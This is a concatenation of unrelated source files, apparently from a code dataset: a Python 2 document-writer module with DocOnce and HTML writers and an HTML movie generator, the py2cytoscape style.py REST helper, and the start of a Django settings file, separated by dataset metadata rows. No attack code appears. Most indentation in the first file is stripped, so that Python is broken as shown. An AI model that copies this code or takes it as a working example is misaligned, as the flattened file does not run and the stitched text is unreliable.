# split out keyword in a description list:
parts = item.split(':')
keyword = parts[0]
item = ':'.join(parts[1:])
item_handler(item, listtype, level, keyword)
else:
item_handler(item, listtype, level)
else:
                raise TypeError, 'wrong type %s for item' % type(item)
item_handler('_end', listtype, level)
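    # Nested lists are expressed as nested Python lists (a sketch; any writer
    # subclass works the same way):
    #   w = HTML()
    #   w.list(['point A', ['sub 1', 'sub 2'], 'point B'])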
def item_handler(self, item, listtype, level, keyword=None):
"""
Write out the syntax for an item in a list.
@param item: text assoicated with the current list item. If item
equals '_begin' or '_end', appropriate begin/end formatting of
the list is written instead of an ordinary item.
@param listtype: 'itemize, 'enumerate', or 'description'.
@param level: list level number, 0 is the mainlist, increased by 1
for each sublist (the level number implies the amount of indentation).
@param keyword: the keyword of the item in a 'description' list.
"""
self.not_impl('item_handler')
def verbatim(self, code):
"""
Write verbatim text in fixed-width form
(typically for computer code).
"""
self.not_impl('verbatim')
def math(self, text):
"""Write block of mathematical text (equations)."""
# default: dump raw
self.raw(text)
def raw(self, text):
"""Write text directly 'as is' to output."""
self.file.write(text)
def figure_conversion(self, filename, extensions):
"""
Convert filename to an image with type according to
extension(s).
The first existing file with an extension encountered in the extensions
list is returned. If no files with the right extensions are found,
the convert utility from the ImageMagick suite is used to
convert filename.ps or filename.eps to filename + extensions[0].
"""
if not isinstance(extensions, (list,tuple)):
extensions = [extensions]
for ext in extensions:
final = filename + ext
if os.path.isfile(final):
return final
final = filename + extensions[0] # convert to first mentioned type
files = glob.glob(filename + '*')
# first convert from ps or eps to other things:
for file in files:
stem, ext = os.path.splitext(file)
if ext == '.ps' or ext == '.eps':
cmd = 'convert %s %s' % (file, final)
print cmd
failure = os.system(cmd)
if failure:
print 'Could not convert;\n %s' % cmd
return final
    # try to convert from the first file to the desired format:
file = files[0]
cmd = 'convert %s %s' % (file, final)
print cmd
failure, outtext = commands.getstatusoutput(cmd)
if failure:
print 'Could not convert;\n %s' % cmd
return final
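    # Behaviour sketch: figure_conversion('plot', ('.png', '.gif')) returns
    # 'plot.png' if it already exists; otherwise an existing plot.ps/plot.eps
    # (or the first matching file) is converted with ImageMagick's convert.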
def figure(self, filename, caption, width=None, height=None, label=None):
"""
Insert a figure into the document.
filename should be without extension; a proper extension is added,
and if the figure is not available in that image format, the
convert utility from ImageMagick is called to convert the format.
"""
self.not_impl('figure')
def table(self, table, column_headline_pos='c', column_pos='c'):
"""
Translates a two-dimensional list of data, containing strings or
numbers, to a suitable "tabular" environment in the output.
@param table: list of list with rows/columns in table, including
(optional) column-headline 1st row and row-headline 1st column.
@param column_pos: specify the l/c/r position of data
entries in columns, give either (e.g.) 'llrrc' or one char
(if all are equal).
@param column_headline_pos : position l/c/r for the headline row
"""
self.not_impl('table')
def url(self, url_address, link_text=None):
"""Typeset an URL (with an optional link)."""
self.not_impl('url')
def link(self, link_text, link_target):
"""Typeset a hyperlink."""
self.not_impl('link')
# what about LaTeX references to labels in equations, pages, labels?
def makedocstr(parent_class, subclass_method):
"""
Compose a string (to be used as doc string) from a method's
doc string in a parent class and an additional doc string
in a subclass version of the method.
@param parent_class: class object for parent class.
@param subclass_method: method object for subclass.
@return: parent_class.method.__doc__ + subclass_method.__doc__
"""
parent_method = getattr(parent_class, subclass_method.__name__)
docstr = parent_method.__doc__
if subclass_method.__doc__ is not None and \
subclass_method is not parent_method:
        docstr += subclass_method.__doc__
return docstr
# regular expressions for inline tags:
# (these are taken from doconce.common.INLINE_TAGS)
inline_tag_begin = r'(?P<begin>(^|[(\s]))'
inline_tag_end = r'(?P<end>($|[.,?!;:)\s]))'
INLINE_TAGS = {
# math: text inside $ signs, as in $a = b$, with space before the
# first $ and space, comma, period, colon, semicolon, or question
# mark after the enclosing $.
'math':
r'%s\$(?P<subst>[^ `][^$`]*)\$%s' % \
(inline_tag_begin, inline_tag_end),
# $latex text$|$pure text alternative$
'math2':
r'%s\$(?P<latexmath>[^ `][^$`]*)\$\|\$(?P<puretext>[^ `][^$`]*)\$%s' % \
(inline_tag_begin, inline_tag_end),
# *emphasized words*
'emphasize':
r'%s\*(?P<subst>[^ `][^*`]*)\*%s' % \
(inline_tag_begin, inline_tag_end),
# `verbatim inline text is enclosed in back quotes`
'verbatim':
r'%s`(?P<subst>[^ ][^`]*)`%s' % \
(inline_tag_begin, inline_tag_end),
# _underscore before and after signifies bold_
'bold':
r'%s_(?P<subst>[^ `][^_`]*)_%s' % \
(inline_tag_begin, inline_tag_end),
}
class DocOnce(_BaseWriter):
def __init__(self):
_BaseWriter.__init__(self, 'DocOnce', '.do.txt')
def title(self, title, authors_and_institutions=[], date='today'):
s = '\nTITLE: %s\n' % title
for ai in authors_and_institutions:
authorinfo = '; '.join(ai)
s += 'AUTHOR: %s\n' % authorinfo
if date is not None:
if date == 'today':
date = self.today_date()
s += 'DATE: %s\n' % date
self.file.write(s)
self.paragraph_separator()
def heading(self, level, title, label=None):
decoration = '='*level
self.file.write('\n%s %s %s\n\n' % (decoration, title, decoration))
def section(self, title, label=None):
self.heading(7, title, label)
def subsection(self, title, label=None):
self.heading(5, title, label)
def subsubsection(self, title, label=None):
self.heading(3, title, label)
def paragraph(self, title, ending='.', label=None):
s = '\n\n__%s%s__ ' % (title, ending)
self.file.write(s)
def paragraph_separator(self):
self.file.write('\n\n')
def text(self, text, indent=0):
text = _BaseWriter.text(self, text, indent)
# not necessary since DocOnce is the format for text:
#text = _BaseWriter.expandtext(self, text,
# INLINE_TAGS, HTML.INLINE_TAGS_SUBST)
self.file.write(text)
def list(self, items, listtype='itemize'):
self.unfold_list(items, self.item_handler, listtype)
def item_handler(self, item, listtype, level, keyword=None):
indent = ' '*level
s = ''
if item == '_begin':
if level == 1:
s += '\n'
elif item == '_end':
if level == 1:
s += '\n'
else:
# ordinary item:
if item is not None:
if listtype == 'itemize':
s += '\n%s%s* %s' % (indent, indent, item)
elif listtype == 'enumerate':
s += '\n%s%so %s' % (indent, indent, item)
elif listtype == 'description':
s += '\n%s%s- %s: %s' % (indent, indent, keyword, item)
self.file.write(s)
def verbatim(self, code):
self.file.write('\n!bc\n' + r'%s' % code + '\n!ec\n')
def figure(self, filename, caption, width=None, height=None, label=None):
filename = self.figure_conversion(filename, \
('.jpg', '.gif', '.png', '.ps', '.eps'))
s = '\nFIGURE:[%s,' % filename
if width:
s += ' width=%s ' % width
if height:
            s += ' height=%s ' % height
s += '] ' + caption + '\n'
self.file.write(s)
def table(self, table, column_headline_pos='c', column_pos='c'):
# Better to factor out code in misc.csv2table!
# See how we do it with html movie...
# find max column width
mcw = 0
for row in table:
mcw = max(mcw, max([len(str(c)) for c in row]))
formatted_table = [] # table where all columns have equal width
column_format = '%%-%ds' % mcw
for row in table:
formatted_table.append([column_format % c for c in row])
width = len(' | '.join(formatted_table[0])) + 4
s = '\n\n |' + '-'*(width-2) + '|\n'
for row in formatted_table:
s += ' | ' + ' | '.join(row) + ' |\n'
s += ' |' + '-'*(width-2) + '|\n\n'
self.file.write(s)
def url(self, url_address, link_text=None):
if link_text is None:
link_text = 'link' # problems with DocOnce and empty link text
self.file.write(' %s<%s>' % (url_address, link_text))
def link(self, link_text, link_target):
self.file.write('%s (%s)' % (link_text, link_target))
# autogenerate doc strings by combining parent class doc strings
# with subclass doc strings:
for method in [title, section, subsection, subsubsection,
paragraph, text,
verbatim, # not defined here: math, raw,
figure, table, url,
list, item_handler,]:
method.__doc__ = makedocstr(_BaseWriter, method)
class HTML(_BaseWriter):
# class variables:
table_border = '2'
table_cellpadding = '5'
table_cellspacing = '2'
INLINE_TAGS_SUBST = { # from inline tags to HTML tags
# keep math as is:
'math': None, # indicates no substitution
'math2': r'\g<begin>\g<puretext>\g<end>',
'emphasize': r'\g<begin><em>\g<subst></em>\g<end>',
'bold': r'\g<begin><b>\g<subst></b>\g<end>',
'verbatim': r'\g<begin><tt>\g<subst></tt>\g<end>',
}
def __init__(self):
_BaseWriter.__init__(self, 'html', '.html')
self.header()
def header(self):
s = """\
<!-- HTML document generated by %s.%s -->
<html>
<body bgcolor="white">
""" % (__name__, self.__class__.__name__)
self.file.write(s)
def footer(self):
s = """
</body>
</html>
"""
self.file.write(s)
def title(self, title, authors_and_institutions=[], date='today'):
s = """
<title>%s</title>
<center><h1>%s</h1></center>
""" % (title, title)
for ai in authors_and_institutions:
author = ai[0]
s += """
<center>
<h4>%s</h4>""" % author
for inst in ai[1:]:
s += """
<h6>%s</h6>""" % inst
s += """\n</center>\n\n"""
if date is not None:
if date == 'today':
date = self.today_date()
s += """<center>%s</center>\n\n\n""" % date
self.file.write(s)
self.paragraph_separator()
def heading(self, level, title, label=None):
if label is None:
s = """\n<h%d>%s</h%d>\n""" % (level, title, level)
else:
s = """\n<h%d><a href="%s">%s</h%d>\n""" % \
(level, label, title, level)
self.file.write(s)
def section(self, title, label=None):
self.heading(1, title, label)
def subsection(self, title, label=None):
self.heading(3, title, label)
def subsubsection(self, title, label=None):
self.heading(4, title, label)
def paragraph(self, title, ending='.', label=None):
s = '\n\n<p><!-- paragraph with heading -->\n<b>%s%s</b>\n' \
% (title, ending)
if label is not None:
s += '<a name="%s">\n' % label
self.file.write(s)
def paragraph_separator(self):
self.file.write('\n<p>\n')
def text(self, text, indent=0):
text = _BaseWriter.text(self, text, indent)
text = _BaseWriter.expandtext(self, text,
INLINE_TAGS, HTML.INLINE_TAGS_SUBST)
self.file.write(text)
def list(self, items, listtype='itemize'):
self.unfold_list(items, self.item_handler, listtype)
def item_handler(self, item, listtype, level, keyword=None):
indent = ' '*level
s = ''
if item == '_begin':
if listtype == 'itemize':
s += '\n%s<ul>' % indent
elif listtype == 'enumerate':
s += '\n%s<ol>' % indent
elif listtype == 'description':
s += '\n%s<dl>' % indent
s += ' <!-- start of "%s" list -->\n' % listtype
elif item == '_end':
if listtype == 'itemize':
s += '%s</ul>' % indent
elif listtype == 'enumerate':
s += '%s</ol>' % indent
elif listtype == 'description':
s += '%s</dl>' % indent
s += ' <!-- end of "%s" list -->\n' % listtype
else:
# ordinary item:
if item is not None:
if listtype in ('itemize', 'enumerate'):
s += '%s%s<p><li> %s\n' % (indent, indent, item)
else:
s += '%s%s<p><dt>%s</dt><dd>%s</dd>\n' % \
(indent, indent, keyword, item)
self.file.write(s)
def verbatim(self, code):
self.file.write('\n<pre>' + r'%s' % code + '\n</pre>\n')
def figure(self, filename, caption, width=None, height=None, label=None):
filename = self.figure_conversion(filename, ('.jpg', '.gif', '.png'))
if width:
width = ' width=%s ' % width
else:
width = ''
if height:
            height = ' height=%s ' % height
else:
height = ''
s = '\n<hr><img src="%s"%s%s>\n<p><em>%s</em>\n<hr><p>\n' % \
(filename, width, height, caption)
self.file.write(s)
def table(self, table, column_headline_pos='c', column_pos='c'):
s = '\n<p>\n<table border="%s" cellpadding="%s" cellspacing="%s">\n' %\
(HTML.table_border, HTML.table_cellpadding, HTML.table_cellspacing)
for line in table:
s += '<tr>'
for column in line:
s += '<td>%s</td>' % column
s += '</tr>\n'
s += '</table>\n\n'
self.file.write(s)
def url(self, url_address, link_text=None):
if link_text is None:
link_text = url_address
self.file.write('\n<a href="%s">%s</a>\n' % (url_address, link_text))
def link(self, link_text, link_target):
        self.file.write('\n<a href="%s">%s</a>\n' % (link_target, link_text))
# autogenerate doc strings by combining parent class doc strings
# with subclass doc strings:
for method in [title, section, subsection, subsubsection,
paragraph, text,
verbatim, # not defined here: math, raw,
figure, table, url,
list, item_handler,]:
method.__doc__ = makedocstr(_BaseWriter, method)
class LaTeX(_BaseWriter):
def __init__(self):
raise NotImplementedError, \
'Use DocOnce class instead and filter to LaTeX'
# Efficient way of generating class DocWriter.
# A better way (for pydoc and other API references) is to
# explicitly list all methods and their arguments and then add
# the body for writer in self.writers: writer.method(arg1, arg2, ...)
class DocWriter:
"""
DocWriter can write documents in several formats at once.
"""
methods = 'title', 'section', 'subsection', 'subsubsection', \
'paragraph', 'paragraph_separator', 'text', 'list', \
'verbatim', 'math', 'raw', 'url', 'link', \
'write_to_file', 'figure', 'table',
def __init__(self, *formats):
"""
@param formats: sequence of strings specifying the desired formats.
"""
self.writers = [eval(format)() for format in formats]
def documents(self):
return [writer.document for writer in self.writers]
def __str__(self):
s = ''
for writer in self.writers:
s += '*'*60 + \
'\nDocWriter: format=%s (without footer)\n' % \
writer.__class__.__name__ + '*'*60
s += str(writer)
return s
def dispatcher(self, *args, **kwargs):
#print 'in dispatcher for', self.method_name, 'with args', args, kwargs
#self.history = (self.method_name, args, kwargs)
for writer in self.writers:
s = getattr(writer, self.method_name)(*args, **kwargs)
'''
Alternative to attaching separate global functions:
def __getattribute__(self, name):
print 'calling __getattribute__ with', name
if name in DocWriter.methods:
self.method_name = name
return self.dispatcher
else:
return object.__getattribute__(self, name)
# can use inspect module to extract doc of all methods and
# put this doc in __doc__
'''
# Autogenerate methods in class DocWriter (with right
# method signature and doc strings stolen from class _BaseWriter (!)):
import inspect
def func_to_method(func, class_, method_name=None):
setattr(class_, method_name or func.__name__, func)
for method in DocWriter.methods:
docstring = eval('_BaseWriter.%s.__doc__' % method)
# extract function signature:
a = inspect.getargspec(eval('_BaseWriter.%s' % method))
if a[3] is not None: # keyword arguments?
kwargs = ['%s=%r' % (arg, value) \
for arg, value in zip(a[0][-len(a[3]):], a[3])]
args = a[0][:-len(a[3])]
allargs = args + kwargs
else:
allargs = a[0]
#print method, allargs, '\n', a
signature_def = '%s(%s)' % (method, ', '.join(allargs))
signature_call = '%s(%s)' % (method, ', '.join(a[0][1:])) # exclude self
code = """\
def _%s:
'''\
%s
'''
for writer in self.writers:
writer.%s
func_to_method(_%s, DocWriter, '%s')
""" % (signature_def, docstring, signature_call, method, method)
#print 'Autogenerating\n', code
exec code
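# Usage sketch for the combined writer (the format names must match writer
# class names defined in this module):
#   d = DocWriter('HTML', 'DocOnce')
#   d.title('My Report')
#   d.section('Introduction')
#   d.text('Some *emphasized* text.')
#   d.write_to_file('report')   # writes report.html and report.do.txt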
def html_movie(plotfiles, interval_ms=300, width=800, height=600,
casename=None):
"""
Takes a list plotfiles, such as::
'frame00.png', 'frame01.png', ...
and creates javascript code for animating the frames as a movie in HTML.
The `plotfiles` argument can be of three types:
* A Python list of the names of the image files, sorted in correct
order. The names can be filenames of files reachable by the
HTML code, or the names can be URLs.
* A filename generator using Unix wildcard notation, e.g.,
``frame*.png`` (the files most be accessible for the HTML code).
* A filename generator using printf notation for frame numbering
and limits for the numbers. An example is ``frame%0d.png:0->92``,
which means ``frame00.png``, ``frame01.png``, ..., ``frame92.png``.
This specification of `plotfiles` also allows URLs, e.g.,
``http://mysite.net/files/frames/frame_%04d.png:0->320``.
If `casename` is None, a casename based on the full relative path of the
first plotfile is used as tag in the variables in the javascript code
such that the code for several movies can appear in the same file
(i.e., the various code blocks employ different variables because
the variable names differ).
The returned result is text strings that incorporate javascript to
loop through the plots one after another. The html text also features
buttons for controlling the movie.
    The parameter `interval_ms` is the time interval between loading
successive images and is in milliseconds.
The `width` and `height` parameters do not seem to have any effect
for reasons not understood.
The following strings are returned: header, javascript code, form
with movie and buttons, footer, and plotfiles::
header, jscode, form, footer, plotfiles = html_movie('frames*.png')
# Insert javascript code in some HTML file
htmlfile.write(jscode + form)
    # Or write a new standalone file that acts as a movie player
    filename = plotfiles[0][:-4] + '.html'
    htmlfile = open(filename, 'w')
    htmlfile.write(header + jscode + form + footer)
    htmlfile.close()
This function is based on code written by R. J. LeVeque, based on
a template from Alan McIntyre.
"""
# Alternative method:
# http://stackoverflow.com/questions/9486961/animated-image-with-javascript
# Start with expanding plotfiles if it is a filename generator
if not isinstance(plotfiles, (tuple,list)):
if not isinstance(plotfiles, (str,unicode)):
raise TypeError('plotfiles must be list or filename generator, not %s' % type(plotfiles))
filename_generator = plotfiles
if '*' in filename_generator:
# frame_*.png
if filename_generator.startswith('http'):
raise ValueError('Filename generator %s cannot contain *; must be like http://some.net/files/frame_%%04d.png:0->120' % filename_generator)
plotfiles = glob.glob(filename_generator)
if not plotfiles:
raise ValueError('No plotfiles on the form %s' %
filename_generator)
plotfiles.sort()
elif '->' in filename_generator:
# frame_%04d.png:0->120
# http://some.net/files/frame_%04d.png:0->120
p = filename_generator.split(':')
filename = ':'.join(p[:-1])
if not re.search(r'%0?\d+', filename):
raise ValueError('Filename generator %s has wrong syntax; missing printf specification as in frame_%%04d.png:0->120' % filename_generator)
if not re.search(r'\d+->\d+', p[-1]):
raise ValueError('Filename generator %s has wrong syntax; must be like frame_%%04d.png:0->120' % filename_generator)
p = p[-1].split('->')
lo, hi = int(p[0]), int(p[1])
plotfiles = [filename % i for i in range(lo,hi+1,1)]
# Check that the plot files really exist, if they are local on the computer
if not plotfiles[0].startswith('http'):
missing_files = [fname for fname in plotfiles
if not os.path.isfile(fname)]
if missing_files:
raise ValueError('Missing plot files: %s' %
str(missing_files)[1:-1])
if casename is None:
# Use plotfiles[0] as the casename, but remove illegal
# characters in variable names since the casename will be
# used as part of javascript variable names.
casename = os.path.splitext(plotfiles[0])[0]
# Use _ for invalid characters
casename = re.sub('[^0-9a-zA-Z_]', '_', casename)
# Remove leading illegal characters until we find a letter or underscore
casename = re.sub('^[^a-zA-Z_]+', '', casename)
filestem, ext = os.path.splitext(plotfiles[0])
    if ext == '.png' or ext == '.jpg' or ext == '.jpeg' or ext == '.gif':
pass
else:
raise ValueError('Plotfiles (%s, ...) must be PNG, JPEG, or GIF files with '\
'extension .png, .jpg/.jpeg, or .gif' % plotfiles[0])
header = """\
<html>
<head>
</head>
<body>
"""
no_images = len(plotfiles)
jscode = """
<script language="Javascript">
<!---
var num_images_%(casename)s = %(no_images)d;
var img_width_%(casename)s = %(width)d;
var img_height_%(casename)s = %(height)d;
var interval_%(casename)s = %(interval_ms)d;
var images_%(casename)s = new Array();
function preload_images_%(casename)s()
{
t = document.getElementById("progress");
""" % vars()
i = 0
for fname in plotfiles:
jscode += """
t.innerHTML = "Preloading image ";
images_%(casename)s[%(i)s] = new Image(img_width_%(casename)s, img_height_%(casename)s);
images_%(casename)s[%(i)s].src = "%(fname)s";
""" % vars()
i = i+1
jscode += """
t.innerHTML = "";
}
function tick_%(casename)s()
{
if (frame_%(casename)s > num_images_%(casename)s - 1)
frame_%(casename)s = 0;
document.name_%(casename)s.src = images_%(casename)s[frame_%(casename)s].src;
frame_%(casename)s += 1;
tt = setTimeout("tick_%(casename)s()", interval_%(casename)s);
}
function startup_%(casename)s()
{
preload_images_%(casename)s();
frame_%(casename)s = 0;
setTimeout("tick_%(casename)s()", interval_%(casename)s);
}
function stopit_%(casename)s()
{ clearTimeout(tt); }
function restart_%(casename)s()
{ tt = setTimeout("tick_%(casename)s()", interval_%(casename)s); }
function slower_%(casename)s()
{ interval_%(casename)s = interval_%(casename)s/0.7; }
function faster_%(casename)s()
{ interval_%(casename)s = interval_%(casename)s*0.7; }
// --->
</script>
""" % vars()
plotfile0 = plotfiles[0]
form = """
<form>
<input type="button" value="Start movie" onClick="startup_%(casename)s()">
<input type="button" value="Pause movie" onClick="stopit_%(casename)s()">
<input type="button" value="Restart movie" onClick="restart_%(casename)s()">
<input type="button" value="Slower" onClick="slower_%(casename)s()">
<input type="button" value="Faster" onClick="faster_%(casename)s()">
</form>
<p><div ID="progress"></div></p>
<img src="%(plotfile0)s" name="name_%(casename)s" border=2/>
""" % vars()
footer = '\n</body>\n</html>\n'
return header, jscode, form, footer, plotfiles
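# Usage sketch (illustrative; the frame filenames are hypothetical and the
# PNG frames must already exist on disk):
#
#   header, jscode, form, footer, plotfiles = \
#       html_movie('frame_%04d.png:0->99', interval_ms=200)
#   with open('movie_player.html', 'w') as htmlfile:
#       htmlfile.write(header + jscode + form + footer)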
def html_movie_embed(moviefile, width=400, height=400):
"""
Return HTML for embedding a moviefile using the default
handling of such files.
"""
text = """
<embed src="%(moviefile)s"
width="%(width)s"
height="%(height)s"
autoplay="false"
loop="true">
</embed>
""" % vars()
return text
def html_movie_embed_wmp(moviefile, width=400, height=400):
"""Return HTML text for embedding a movie file
(Windows Media Player code)."""
text = """
<object id="MediaPlayer1" width="180" height="200"
classid="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95"
codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701"
standby="Loading Microsoft Windows Media Player components..."
type="application/x-oleobject" align="middle">
<param name="FileName" value="%(moviefile)s">
<param name="ShowStatusBar" value="True">
<param name="DefaultFrame" value="mainFrame">
<param name="autostart" value="false">
<embed type="application/x-mplayer2"
pluginspage = "http://www.microsoft.com/Windows/MediaPlayer/"
src="%(moviefile)s"
autostart="false"
align="middle"
width="%(width)s"
height="%(height)s"
loop="100"
defaultframe="rightFrame"
showstatusbar="true">
</embed>
</object>
<!--
<a href="%(moviefile)s"><font size="2">Download movie file</font></a>
<a href="http://www.microsoft.com/windows/windowsmedia/mp10/default.aspx">
<font size="1">Download Windows Media Player</font></a></p>
-->
<!--
Attributes of the <embed> tag are:
src - tells what file to use.
autostart="true" - tells the computer to start the Video playing upon loading the page.
autostart="false" - tells the computer not to start the Video playing upon loading the page. You must click the start button to make the Video play.
align=middle - tells the computer to put the start/stop buttons to the middle.
width= and height= - are the dimensions of a small button panel that will appear when the page loads and contains both a START & STOP button so the visitor can start/stop the Video.
loop=2 - will play the Video for two complete loops.
-->
""" % vars()
return text
def html_movie_embed_qt(moviefile, width=400, height=400):
"""Return HTML for embedding a moviefile (QuickTime code)."""
text = """
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
codebase="http://www.apple.com/qtactivex/qtplugin.cab"
width="%(width)s" height="%(height)s" >
<param name="src" value="%(moviefile)s" >
<param name="autoplay" value="false" >
<embed src="%(moviefile)s"
pluginspage="http://www.apple.com/quicktime/download"
width="%(width)s" height="%(height)s" autoplay="false">
</embed>
</object>
""" % vars()
return text
def _test(d):
# d is formatclass() or DocWriter(HTML, LaTeX, ...)
print '\n\n', '*'*70, \
'\n*** Testing class "%s"\n' % d.__class__.__name__, '*'*70
d.title('My Test of Class %s' % d.__class__.__name__,
[('Hans Petter Langtangen',
'Simula Research Laboratory',
'Dept. of Informatics, Univ. of Oslo'),
])
d.section('First Section')
d.text("""
Here is some
text for section 1.
This is a *first* example of using the _DocWriter
module_ for writing documents from *Python* scripts.
It could be a nice tool since we do not need to bother
with special typesetting, such as `fixed width fonts`
in plain text.
""")
d.subsection('First Subsection')
d.text('Some text for the subsection.')
d.paragraph('Test of a Paragraph')
d.text("""
Some paragraph text taken from "Documenting Python": The Python language
has a substantial body of documentation, much of it contributed by various
authors. The markup used for the Python documentation is based on
LaTeX and requires a significant set of macros written specifically
for documenting Python. This document describes the macros introduced
to support Python documentation and how they should be used to support
a wide range of output formats.
This document describes the document classes and special markup used
in the Python documentation. Authors may use this guide, in
conjunction with the template files provided with the distribution, to
create or maintain whole documents or sections.
If you're interested in contributing to Python's documentation,
there's no need to learn LaTeX if you're not so inclined; plain text
contributions are more than welcome as well.
""")
d.text('Here is an enumerate list:')
samplelist = ['item1', 'item2',
['subitem1', 'subitem2'],
'item3',
['subitem3', 'subitem4']]
d.list(samplelist, listtype='enumerate')
d.text('...with some trailing text.')
d.subsubsection('First Subsubsection with an Itemize List')
d.list(samplelist, listtype='itemize')
d.text('Here is some Python code:')
d.verbatim("""
class A:
pass
class B(A):
pass
b = B()
b.item = 0 # create a new attribute
""")
d.section('Second Section')
d.text('Here is a description list:')
d.list(['keyword1: item1', 'keyword2: item2 goes here, with a colon : and some text after',
['key3: subitem1', 'key4: subitem2'],
'key5: item3',
['key6: subitem3', 'key7: subitem4']],
listtype='description')
d.paragraph_separator()
d.text('And here is a table:')
d.table([['a', 'b'], ['c', 'd'], ['e', 'and a longer text']])
print d
d.write_to_file('tmp_%s' % d.__class__.__name__)
if __name__ == '__main__':
formats = HTML, DocOnce
for format in formats:
d = format()
_test(d)
formats_str = [format.__name__ for format in formats]
d = DocWriter(*formats_str)
_test(d)
| bsd-3-clause | 2,413,235,996,077,832,000 | 35.289572 | 181 | 0.585863 | false | 3.764973 | false | false | false |
idekerlab/py2cytoscape | py2cytoscape/data/style.py | 1 | 6533 | from . import BASE_URL, HEADERS
import requests
import json
import pandas as pd
import warnings
warnings.warn('\n\n\n**** data.style will be deprecated in the next py2cytoscape release. ****\n\n\n')
class Style(object):
def __init__(self, name):
# Validate required argument
if name is None:
raise ValueError("Style name is required.")
else:
self.__name = name
self.__url = BASE_URL + 'styles/' + str(name) + '/'
def get_name(self):
"""
Get immutable name of this Visual Style.
:return: Style name as string
"""
return self.__name
def __get_new_mapping(self, mapping_type, column=None, col_type='String',
vp=None):
if column is None or vp is None:
raise ValueError('both column name and visual property are required.')
new_maping = {
'mappingType': mapping_type,
'mappingColumn': column,
'mappingColumnType': col_type,
'visualProperty': vp
}
return new_maping
def create_discrete_mapping(self, column=None, col_type='String',
vp=None, mappings=None):
self.__call_create_mapping(
self.__get_discrete(column=column, col_type=col_type, vp=vp,
mappings=mappings))
def create_continuous_mapping(self, column=None, col_type='String',
vp=None, points=None):
self.__call_create_mapping(
self.__get_continuous(column=column, col_type=col_type, vp=vp,
points=points))
def create_passthrough_mapping(self, column=None, col_type='String',
vp=None):
self.__call_create_mapping(
self.__get_passthrough(column=column, col_type=col_type, vp=vp))
def __call_create_mapping(self, mapping):
url = self.__url + 'mappings'
requests.post(url, data=json.dumps([mapping]), headers=HEADERS)
def __get_passthrough(self, column=None, col_type='String', vp=None):
return self.__get_new_mapping('passthrough', column=column,
col_type=col_type, vp=vp)
def __get_discrete(self, column=None, col_type='String', vp=None,
mappings=None):
new_mapping = self.__get_new_mapping('discrete', column=column,
col_type=col_type, vp=vp)
if mappings is None:
raise ValueError('key-value pair object (mappings) is required.')
body = [{'key': key, 'value': mappings[key]} for key in mappings.keys()]
new_mapping['map'] = body
return new_mapping
def __get_continuous(self, column=None, col_type='String', vp=None,
points=None):
if points is None:
raise ValueError('key-value pair object (mappings) is required.')
new_mapping = self.__get_new_mapping('continuous', column=column,
col_type=col_type, vp=vp)
new_mapping['points'] = points
return new_mapping
def get_mapping(self, vp=None):
if vp is None:
raise ValueError('Visual Property ID is required.')
url = self.__url + 'mappings/' + vp
return requests.get(url).json()
def get_mappings(self):
url = self.__url + 'mappings'
return requests.get(url).json()
def get_default(self, vp=None):
if vp is None:
raise ValueError('Visual Property ID is required.')
url = self.__url + 'defaults/' + vp
        key_value_pair = requests.get(url).json()
        return pd.Series(
            {key_value_pair['visualProperty']: key_value_pair['value']})
def get_defaults(self):
url = self.__url + 'defaults'
result = requests.get(url).json()['defaults']
vals = {entry['visualProperty']: entry['value'] for entry in result}
return pd.Series(vals)
def update_defaults(self, prop_value_dict):
"""
Updates the value of one or more visual properties.
:param prop_value_dict: Dictionary containing, for each visual property,
the new value to use.
"""
body = []
for key in prop_value_dict:
entry = {
'visualProperty': key,
'value': prop_value_dict[key]
}
body.append(entry)
url = self.__url + 'defaults'
requests.put(url, data=json.dumps(body), headers=HEADERS)
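    # Usage sketch (illustrative only; assumes a reachable Cytoscape REST
    # endpoint, an existing style named 'default', and that the visual
    # property IDs below are valid in your Cytoscape session):
    #
    #   style = Style('default')
    #   style.update_defaults({'NODE_FILL_COLOR': '#FF0000',
    #                          'NODE_SIZE': 40})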
# Delete Methods
def delete_mapping(self, vp=None):
if vp is None:
return
url = self.__url + 'mappings/' + vp
requests.delete(url)
def delete_mappings(self):
url = self.__url + 'mappings'
requests.delete(url)
class StyleUtil(object):
    @staticmethod
    def create_point(value, lesser, equal, greater):
return [
{
'value': str(value),
'lesser': lesser,
'equal': equal,
'greater': greater
}
]
    @staticmethod
    def create_2_color_gradient(min=0, max=10, colors=('red', 'green')):
point_1 = StyleUtil.create_point(min, colors[0], colors[0], colors[0])
point_2 = StyleUtil.create_point(max, colors[1], colors[1], colors[1])
return point_1 + point_2
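    # Illustrative combination with Style.create_continuous_mapping (assumes
    # `style` is a Style instance; the column name 'Degree' is hypothetical):
    #
    #   points = StyleUtil.create_2_color_gradient(min=1, max=20,
    #                                              colors=('white', 'red'))
    #   style.create_continuous_mapping(column='Degree', col_type='Double',
    #                                   vp='NODE_FILL_COLOR', points=points)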
    @staticmethod
    def create_3_color_gradient(min=-5, mid=0, max=5, colors=('blue', 'white', 'red')):
# can be updated to use StyleUtil.create_point like in create_point
points = [
{
'value': str(min),
'lesser': colors[0],
'equal': colors[0],
'greater': colors[0],
},
{
'value': str(mid),
'lesser': colors[1],
'equal': colors[1],
'greater': colors[1],
},
{
'value': str(max),
'lesser': colors[2],
'equal': colors[2],
'greater': colors[2]
}
]
return points
    @staticmethod
    def create_slope(min=0, max=10, values=(1, 10)):
point_1 = StyleUtil.create_point(min, values[0], values[0], values[0])
point_2 = StyleUtil.create_point(max, values[1], values[1], values[1])
return point_1 + point_2
| mit | 7,537,577,756,058,937,000 | 32.849741 | 102 | 0.529772 | false | 4.045201 | false | false | false |
srmagura/goodnight-lead | goodnight_lead/settings/common.py | 1 | 2349 | """LEAD common settings."""
# Imports
from pathlib import Path
# Project base directory
BASE_DIR = Path(__file__).absolute().parent.parent.parent
# Installed applications
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ckeditor',
'gl_site'
)
# Configure middleware
MIDDLEWARE = (
# Security
'django.middleware.security.SecurityMiddleware',
# Whitenoise
'whitenoise.middleware.WhiteNoiseMiddleware',
# Other
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
)
